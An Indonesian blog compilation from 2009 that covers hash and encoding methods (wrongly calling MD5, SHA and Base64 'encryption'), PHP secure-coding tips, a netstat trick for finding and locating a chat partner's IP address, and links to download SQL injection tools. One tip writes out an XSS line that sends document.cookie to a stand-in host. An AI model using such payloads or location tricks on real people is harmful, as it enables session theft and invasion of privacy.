Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus.
Keuntungan dari enkripsi adalah kode asli kita tidak dapat dibaca oleh orang lain.
Berikut ada beberapa macam metode enkripsi yang dapat anda digunakan pada pemrograman website seperti PHP, ASP dan yang lainnya.
1. Metode Enkripsi MD2
Message-Digest algortihm 2 (MD2) adalah fungsi hash cryptographic yang dikembangkan oleh Ronald Rivest pada tahun 1989.
Algoritma dioptimalkan untuk komputer 8-bit. MD2 yang ditetapkan dalam RFC 1319.
Meskipun algoritma lainnya telah diusulkan sejak dulu, seperti MD4, MD5 dan SHA, bahkan sampai dengan 2004 [update] MD2 tetap digunakan dalam infrastruktur kunci publik sebagai bagian dari sertifikat yang dihasilkan dengan MD2 dan RSA.
2. Metode Enkripsi MD4
Message-Digest algortihm 4(seri ke-4) yang dirancang oleh Profesor Ronald Rivest dari MIT pada tahun 1990.
Panjangnya adalah 128 bit.
MD4 juga digunakan untuk menghitung NT-hash ringkasan password pada Microsoft Windows NT, XP dan Vista.
3. Metode Enkripsi MD5
MD5 adalah salah satu dari serangkaian algortima message digest yang didesain oleh Profesor Ronald Rivest dari MIT (Rivest, 1994).
Saat kerja analitik menunjukkan bahwa pendahulu MD5 yaitu MD4 mulai tidak aman, MD5 kemudian didesain pada tahun 1991 sebagai pengganti dari MD4 (kelemahan MD4 ditemukan oleh Hans Dobbertin).
Dalam kriptografi, MD5 (Message-Digest algortihm 5) ialah fungsi hash kriptografik yang digunakan secara luas dengan hash value 128-bit.
Pada standart Internet (RFC 1321), MD5 telah dimanfaatkan secara bermacam-macam pada aplikasi keamanan, dan MD5 juga umum digunakan untuk melakukan pengujian integritas sebuah file.
4. Metode Enkripsi SHA
SHA adalah serangkaian fungsi cryptographic hash yang dirancang oleh National Security Agency (NSA) dan diterbitkan oleh NIST sebagai US Federal Information Processing Standard.
SHA adalah Secure Hash Algoritma. Jenis-jenis SHA yaitu SHA-0, SHA-1, dan SHA-2.
Untuk SHA-2 menggunakan algoritma yang identik dengan ringkasan ukuran variabel yang terkenal sebagai SHA-224, SHA-256, SHA-384, dan SHA-512.
5. Metode Enkripsi RC4
RC4 merupakan salah satu jenis stream cipher, yaitu memproses unit atau input data pada satu saat. Unit atau data pada umumnya sebuah byte atau bahkan kadang kadang bit (byte dalam hal RC4).
Dengan cara ini enkripsi atau dekripsi dapat dilaksanakan pada panjang yang variabel.
RC4 adalah penyandian stream cipher yang dibuat oleh Ron Riverst pada tahun 1987 untuk pengamanan RSA.
Algoritmanya didasarkan pada permutasi acak.
6. Metode Enkripsi Base64
Base64 adalah sistem untuk mewakili data mentah byte sebagai karakter ASCII.
Base64 menyediakan 6-bit encoding 8-bit ASCII karakter.
Base64 merupakan format yang dicetak menggunakan karakter, memungkinkan binari data yang akan dikirim dalam bentuk dan email, dan akan disimpan di database atau file.
sumber : http://securehacklink.org
Thursday, May 28, 2009
Mengenal Jenis Enkripsi
Melacak IP Adderss
1.cara melacak alamt IP suatu situs
untuk melakukan hal ini tidak diperlukan suatu software khusus cukup menggunakan
fasilitas yang telah disediakan oleh windows.Kita bisa menggunakan Dos.Caranya
masuk ke comand prompt.anda bisa klik Run-cmd-dan ketikkan ping
Nama situs yang ingin dilacak lalu tekan enter.Setelah
anda tekan enter,maka akan tertera alamat IP situs tersebut.
2.Melacak lokasi server(real address)
Setelah anda mendapatkan IP address situs tersebut.Andapun bisa mengetahui
dimana lokasi negara dan kota situs tersebut berada.Caranya buka
www.domainwhitepages.com.Lalu masukkan IP address situs tersebut atau alamat
situs tersebut.andapun akan mendapatkan informasi lengkap tentang lokasi situs tersebut.
Setelah anda membaca 2 trik diatas,kita bisa menggabungkan 2 trik tersebut untuk Melacak IP address Lawan chatting.Kitapun bisa mengetahui IP address lawan chatting kita menggunakan Yahoo Messenger.Caranya adalah:kirimkan satu file bebas apa saja.mengapa harus mengirimkan file terlebih dahulu?ini berfungsi sebagai timing waktu untuk mengetikkan perintah perintah untuk menampilkan IP adrress teman chatt anda.Disarankan diatas 500 kb.Lebih besar file yang dikirim lebih bagus,karena akan menyebabkan waktu anda lebih banyak.Kemudian masuk ke Dos melalui command prompt(Run-cmd)lalu ketikkan NETSTAT -N dan tekan enter.Maka alamat IP teman chatting anda akan muncul beserta port yang digunakan untuk mengirim file tadi.contoh:202.133.80.45 :3000+++.(202.133.80.45 adalah nomor IP dan 3000+++ adalah port yang tadi anda kirimin file.untuk mengetahui lokasi lawan chatting anda seperti berada di kampus,kantor ataupun warnet mana,anda bisa chek di www.domainwhitepages.com dengan memasukkan alamat IP yang telah anda dapatkan
sumber : http://cyberdos.org
Security Knowledge in PHP
Keamanan 1 :
Hindari menggunakan sebuah variabel untuk include : Misalnya
include($_GET["string"]);
Bila terpaksa coba untuk validasi
Keamanan 2 :
Hindari register global = on (ini sudah basic). Register global dapat menyebabkan variabel saling bentrok. misalkan variabel $_GET["login"] dan $_SESSION["login"] yang sama namanya kan bila register global on akan terlihat $login saja. dalam hal ini $login yang milik get yang menang.
Keamanan 3 :
Validasi posting form kamu, gunakan HTMLSPECIALCHARS(); orang yang jahat dapat memasukkan data ini kedalam form login kamu
HTMLSPECIALCHAR akan mengconvert kata < menjadi < dan > menjadi >
Keamaman 4 :
XSS atau Cross Site Scripting adalah trend baru sekarang, kita cukup memasukkan data tambahan
nah, perintah diatas sana bisa dimodifikasi menjadi sebuah perintah window.open(http://www.apaaja.com+'?cookies=' + document.cookie);
maka hacker akan mampu mengambil valid session id dari cookie.
Keamanan 5
Intepreter PHP3 dan beberapa versi awal PHP 4.0.x punya masalah dalam logging error. PHP akan memanggil fungsi C yaitu functions syslog() dan vsnprintf() dalam melakukan logging. Sangat mungkin data yang dikirim ke fungsi itu adalah user input.
Keamanan 6 :
is_uploaded_file($path) harus digunakan untuk memvalidasi file yang diupload (agar tidak ada user yang memasukkan path palsu kedalam form upload untuk mengambil file lain).
Keamanan 7 :
hati-hati, jangan pernah menjalankan input yang belum unescaped query. Hal ini dapat menyebabkan SQL Injection. Selalu hapus karakter ' dan " yang berasal dari input atau tambahkan \. Misalkan login form, input yang kalian harapkan akan berkisar dari 0-9 dan a-z bila ada karakter ' (petik satu) atau lainnya harus dihapus.
Keamanan 8 :
hati-hati perintah eval() yang mampu mengeksekusi sebuah string seperti PHP code. Jangan izinkan input dari user asing tanpa validasi.
$string = 'cup';
$name = 'coffee';
$str = 'This is a $string with my $name in it.';
echo $str. "\n";
eval("\$str = \"$str\";");
echo $str. "\n";
?>
hasilnya
This is a $string with my $name in it.
This is a cup with my coffee in it.
keamanan 9 :
untuk semua file include kamu, pakai extension *.php jangan *.inc, *.h atau sejenisnya karena dapat dengan mudah terbuka pada browser (tampil sebagai text bukan hasil output script). Lebih baik lagi bila melakukan konfigurasi di apache conf agar *.htm dianggap sebagai file php.
sumber : http://securehacklink.org
Alat perang pengetest website
http://www.4shared. com/file/ 103908451/ 1db4bbe6/ SQL_Exploiter_ Pro_v210. html
http://www.4shared. com/file/ 103908789/ a487f3c0/ SQL_Injection_ Pentesting_ TooL30.html
http://www.4shared. com/file/ 71839955/ 297f0caa/ Sql-Injection. html
http://www.4shared. com/file/ 106058970/ ed8a8bbe/ Web_Hacking_ Tools.html
sumber : http://securehacklink.org